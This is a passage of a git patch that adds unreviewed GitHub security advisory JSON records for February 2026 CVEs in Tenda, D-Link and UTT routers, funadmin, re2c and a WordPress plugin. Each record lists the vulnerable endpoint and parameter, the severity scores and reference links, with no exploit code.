+ "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2908" + }, + { + "type": "WEB", + "url": "https://github.com/QIU-DIE/cve-nneeww/issues/10" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347217" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347217" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755202" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T02:16:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-2hp3-cccc-h69r/GHSA-2hp3-cccc-h69r.json b/advisories/unreviewed/2026/02/GHSA-2hp3-cccc-h69r/GHSA-2hp3-cccc-h69r.json new file mode 100644 index 0000000000000..80bb053fb03ad --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2hp3-cccc-h69r/GHSA-2hp3-cccc-h69r.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2hp3-cccc-h69r", + "modified": "2026-02-22T03:30:27Z", + "published": "2026-02-22T03:30:27Z", + "aliases": [ + "CVE-2026-2906" + ], + "details": "A security flaw has been discovered in Tenda HG9 300001138. Affected is an unknown function of the file /boaform/formSamba of the component Samba Configuration Endpoint. The manipulation of the argument sambaCap results in stack-based buffer overflow. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2906" + }, + { + "type": "WEB", + "url": "https://github.com/QIU-DIE/cve-nneeww/issues/8" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347215" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347215" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755193" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T02:16:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7948-p5vf-r2m4/GHSA-7948-p5vf-r2m4.json b/advisories/unreviewed/2026/02/GHSA-7948-p5vf-r2m4/GHSA-7948-p5vf-r2m4.json new file mode 100644 index 0000000000000..b8ccdf71f61ad --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7948-p5vf-r2m4/GHSA-7948-p5vf-r2m4.json @@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7948-p5vf-r2m4", + "modified": "2026-02-22T03:30:26Z", + "published": "2026-02-22T03:30:26Z", + "aliases": [ + "CVE-2026-2903" + ], + "details": "A flaw has been found in skvadrik re2c up to 4.4. Impacted is the function check_and_merge_special_rules of the file src/parse/ast.cc. This manipulation causes null pointer dereference. The attack can only be executed locally. The exploit has been published and may be used. Patch name: febeb977936f9519a25d9fbd10ff8256358cdb97. It is suggested to install a patch to address this issue.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2903" + }, + { + "type": "WEB", + "url": "https://github.com/skvadrik/re2c/issues/571" + }, + { + "type": "WEB", + "url": "https://github.com/skvadrik/re2c/issues/571#issuecomment-3837675101" + }, + { + "type": "WEB", + "url": "https://github.com/skvadrik/re2c/commit/febeb977936f9519a25d9fbd10ff8256358cdb97" + }, + { + "type": "WEB", + "url": "https://github.com/oneafter/0202/blob/main/re/repro" + }, + { + "type": "WEB", + "url": "https://github.com/skvadrik/re2c" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347210" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347210" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755030" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-404" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T01:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-83cp-rj94-v2g2/GHSA-83cp-rj94-v2g2.json b/advisories/unreviewed/2026/02/GHSA-83cp-rj94-v2g2/GHSA-83cp-rj94-v2g2.json new file mode 100644 index 0000000000000..caa4e95219602 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-83cp-rj94-v2g2/GHSA-83cp-rj94-v2g2.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-83cp-rj94-v2g2", + "modified": "2026-02-22T03:30:26Z", + "published": "2026-02-22T03:30:26Z", + "aliases": [ + "CVE-2026-2905" + ], + "details": "A vulnerability was identified in Tenda HG9 300001138. This impacts an unknown function of the file /boaform/formWlanSetup of the component Wireless Configuration Endpoint. The manipulation of the argument ssid leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit is publicly available and might be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2905" + }, + { + "type": "WEB", + "url": "https://github.com/QIU-DIE/cve-nneeww/issues/7" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347214" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347214" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755167" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T02:16:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8pgv-26pm-rgm8/GHSA-8pgv-26pm-rgm8.json b/advisories/unreviewed/2026/02/GHSA-8pgv-26pm-rgm8/GHSA-8pgv-26pm-rgm8.json new file mode 100644 index 0000000000000..f35bf25f350e8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8pgv-26pm-rgm8/GHSA-8pgv-26pm-rgm8.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8pgv-26pm-rgm8", + "modified": "2026-02-22T03:30:26Z", + "published": "2026-02-22T03:30:26Z", + "aliases": [ + "CVE-2026-2909" + ], + "details": "A vulnerability was detected in Tenda HG9 300001138. This affects an unknown part of the file /boaform/formPing of the component Diagnostic Ping Endpoint. Performing a manipulation of the argument pingAddr results in stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit is now public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2909" + }, + { + "type": "WEB", + "url": "https://github.com/QIU-DIE/cve-nneeww/issues/11" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347218" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347218" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755211" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T02:16:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-gcxp-xg77-798j/GHSA-gcxp-xg77-798j.json b/advisories/unreviewed/2026/02/GHSA-gcxp-xg77-798j/GHSA-gcxp-xg77-798j.json new file mode 100644 index 0000000000000..eba2166fc15ef --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gcxp-xg77-798j/GHSA-gcxp-xg77-798j.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gcxp-xg77-798j", + "modified": "2026-02-22T03:30:26Z", + "published": "2026-02-22T03:30:26Z", + "aliases": [ + "CVE-2026-2898" + ], + "details": "A vulnerability was detected in funadmin up to 7.1.0-rc4. This issue affects the function getMember of the file app/common/service/AuthCloudService.php of the component Backend Endpoint. The manipulation of the argument cloud_account results in deserialization. The attack may be performed from remote. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2898" + }, + { + "type": "WEB", + "url": "https://github.com/I4m6da/CVE/issues/5" + }, + { + "type": "WEB", + "url": "https://github.com/I4m6da/CVE/issues/5#issue-3890444166" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347209" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347209" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753976" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T01:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jcjg-5j5x-r2hc/GHSA-jcjg-5j5x-r2hc.json b/advisories/unreviewed/2026/02/GHSA-jcjg-5j5x-r2hc/GHSA-jcjg-5j5x-r2hc.json new file mode 100644 index 0000000000000..6ebb73c1982d1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jcjg-5j5x-r2hc/GHSA-jcjg-5j5x-r2hc.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jcjg-5j5x-r2hc", + "modified": "2026-02-22T03:30:26Z", + "published": "2026-02-22T03:30:26Z", + "aliases": [ + "CVE-2026-2904" + ], + "details": "A vulnerability was determined in UTT HiPER 810G 1.7.7-171114. This affects the function strcpy of the file /goform/ConfigExceptAli. Executing a manipulation can lead to buffer overflow. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2904" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347213" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347213" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755113" + }, + { + "type": "WEB", + "url": "https://vuln.ricky.place/UTT/HiPER%20810G" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T01:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jgr4-277v-42mv/GHSA-jgr4-277v-42mv.json b/advisories/unreviewed/2026/02/GHSA-jgr4-277v-42mv/GHSA-jgr4-277v-42mv.json new file mode 100644 index 0000000000000..b4a317fb54dc5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jgr4-277v-42mv/GHSA-jgr4-277v-42mv.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jgr4-277v-42mv", + "modified": "2026-02-22T03:30:27Z", + "published": "2026-02-22T03:30:26Z", + "aliases": [ + "CVE-2026-2907" + ], + "details": "A weakness has been identified in Tenda HG9 300001138. Affected by this vulnerability is an unknown functionality of the file /boaform/formgponConf of the component GPON Configuration Endpoint. This manipulation of the argument fmgpon_loid/fmgpon_loid_password causes stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2907" + }, + { + "type": "WEB", + "url": "https://github.com/QIU-DIE/cve-nneeww/issues/9" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347216" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347216" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755201" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T02:16:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rfh7-7v27-6p9r/GHSA-rfh7-7v27-6p9r.json b/advisories/unreviewed/2026/02/GHSA-rfh7-7v27-6p9r/GHSA-rfh7-7v27-6p9r.json new file mode 100644 index 0000000000000..5d1358d27bb9a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rfh7-7v27-6p9r/GHSA-rfh7-7v27-6p9r.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rfh7-7v27-6p9r", + "modified": "2026-02-22T03:30:26Z", + "published": "2026-02-22T03:30:26Z", + "aliases": [ + "CVE-2026-2897" + ], + "details": "A security vulnerability has been detected in funadmin up to 7.1.0-rc4. This vulnerability affects unknown code of the file app/backend/view/index/index.html of the component Backend Interface. The manipulation of the argument Value leads to cross site scripting. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2897" + }, + { + "type": "WEB", + "url": "https://github.com/I4m6da/CVE/issues/4" + }, + { + "type": "WEB", + "url": "https://github.com/I4m6da/CVE/issues/4#issue-3890421022" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347208" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347208" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753975" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T01:16:00Z" + } +} \ No newline at end of file From 1b8b37e8cccb8b1fbe9c05031c0d49992faa75f7 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sun, 22 Feb 2026 06:31:29 +0000 Subject: [PATCH 42/77] Publish Advisories GHSA-c324-4x25-3fp3 GHSA-c8cm-m492-rqr8 GHSA-f565-6pjw-3whr GHSA-fxq4-96xx-h92h GHSA-m87m-887p-w3r5 GHSA-mmwr-f26g-hp2q GHSA-pp46-7w92-4xvf GHSA-qf2x-h525-fc86 GHSA-qjwf-h778-47mm GHSA-v4fw-f854-rf72 --- .../GHSA-c324-4x25-3fp3.json | 56 +++++++++++++++ .../GHSA-c8cm-m492-rqr8.json | 56 +++++++++++++++ .../GHSA-f565-6pjw-3whr.json | 29 ++++++++ .../GHSA-fxq4-96xx-h92h.json | 56 +++++++++++++++ .../GHSA-m87m-887p-w3r5.json | 56 +++++++++++++++ .../GHSA-mmwr-f26g-hp2q.json | 56 +++++++++++++++ .../GHSA-pp46-7w92-4xvf.json | 56 +++++++++++++++ .../GHSA-qf2x-h525-fc86.json | 56 +++++++++++++++ .../GHSA-qjwf-h778-47mm.json | 68 +++++++++++++++++++ .../GHSA-v4fw-f854-rf72.json | 56 +++++++++++++++ 10 files changed, 545 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-c324-4x25-3fp3/GHSA-c324-4x25-3fp3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-c8cm-m492-rqr8/GHSA-c8cm-m492-rqr8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-f565-6pjw-3whr/GHSA-f565-6pjw-3whr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fxq4-96xx-h92h/GHSA-fxq4-96xx-h92h.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m87m-887p-w3r5/GHSA-m87m-887p-w3r5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mmwr-f26g-hp2q/GHSA-mmwr-f26g-hp2q.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pp46-7w92-4xvf/GHSA-pp46-7w92-4xvf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qf2x-h525-fc86/GHSA-qf2x-h525-fc86.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qjwf-h778-47mm/GHSA-qjwf-h778-47mm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-v4fw-f854-rf72/GHSA-v4fw-f854-rf72.json diff --git a/advisories/unreviewed/2026/02/GHSA-c324-4x25-3fp3/GHSA-c324-4x25-3fp3.json b/advisories/unreviewed/2026/02/GHSA-c324-4x25-3fp3/GHSA-c324-4x25-3fp3.json new file mode 100644 index 0000000000000..69f0736d178f6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-c324-4x25-3fp3/GHSA-c324-4x25-3fp3.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c324-4x25-3fp3", + "modified": "2026-02-22T06:30:17Z", + "published": "2026-02-22T06:30:17Z", + "aliases": [ + "CVE-2026-2929" + ], + "details": "A vulnerability was determined in D-Link DWR-M960 1.01.07. Impacted is the function sub_453140 of the file /boafrm/formWlAc of the component Wireless Access Control Endpoint. This manipulation of the argument submit-url causes stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2929" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve-new/issues/24" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347276" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347276" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754503" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T06:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-c8cm-m492-rqr8/GHSA-c8cm-m492-rqr8.json b/advisories/unreviewed/2026/02/GHSA-c8cm-m492-rqr8/GHSA-c8cm-m492-rqr8.json new file mode 100644 index 0000000000000..027db9ce82a37 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-c8cm-m492-rqr8/GHSA-c8cm-m492-rqr8.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c8cm-m492-rqr8", + "modified": "2026-02-22T06:30:17Z", + "published": "2026-02-22T06:30:17Z", + "aliases": [ + "CVE-2026-2927" + ], + "details": "A vulnerability has been found in D-Link DWR-M960 1.01.07. This vulnerability affects the function sub_462590 of the file /boafrm/formOpMode of the component Operation Mode Configuration Endpoint. The manipulation of the argument submit-url leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2927" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve-new/issues/22" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347274" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347274" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754499" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T05:16:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-f565-6pjw-3whr/GHSA-f565-6pjw-3whr.json b/advisories/unreviewed/2026/02/GHSA-f565-6pjw-3whr/GHSA-f565-6pjw-3whr.json new file mode 100644 index 0000000000000..9d5c56f007d84 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-f565-6pjw-3whr/GHSA-f565-6pjw-3whr.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f565-6pjw-3whr", + "modified": "2026-02-22T06:30:17Z", + "published": "2026-02-22T06:30:17Z", + "aliases": [ + "CVE-2026-1369" + ], + "details": "The Conditional CAPTCHA WordPress plugin through 4.0.0 does not validate a parameter before redirecting the user to its value, leading to an Open Redirect issue", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1369" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/5a275725-85f2-4463-880b-9473dbdfa8e0" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T06:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fxq4-96xx-h92h/GHSA-fxq4-96xx-h92h.json b/advisories/unreviewed/2026/02/GHSA-fxq4-96xx-h92h/GHSA-fxq4-96xx-h92h.json new file mode 100644 index 0000000000000..1c750d44b58d2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fxq4-96xx-h92h/GHSA-fxq4-96xx-h92h.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fxq4-96xx-h92h", + "modified": "2026-02-22T06:30:16Z", + "published": "2026-02-22T06:30:16Z", + "aliases": [ + "CVE-2026-2910" + ], + "details": "A flaw has been found in Tenda HG9 300001138. This vulnerability affects unknown code of the file /boaform/formPing6. Executing a manipulation of the argument pingAddr can lead to stack-based buffer overflow. The attack may be performed from remote. The exploit has been published and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2910" + }, + { + "type": "WEB", + "url": "https://github.com/QIU-DIE/cve-nneeww/issues/12" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347219" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347219" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755212" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T04:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m87m-887p-w3r5/GHSA-m87m-887p-w3r5.json b/advisories/unreviewed/2026/02/GHSA-m87m-887p-w3r5/GHSA-m87m-887p-w3r5.json new file mode 100644 index 0000000000000..144e5a29b5f03 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-m87m-887p-w3r5/GHSA-m87m-887p-w3r5.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m87m-887p-w3r5", + "modified": "2026-02-22T06:30:17Z", + "published": "2026-02-22T06:30:17Z", + "aliases": [ + "CVE-2026-2926" + ], + "details": "A flaw has been found in D-Link DWR-M960 1.01.07. This affects the function sub_4237AC of the file /boafrm/formLteSetup of the component LTE Configuration Endpoint. Executing a manipulation of the argument submit-url can lead to stack-based buffer overflow. The attack can be launched remotely. The exploit has been published and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": 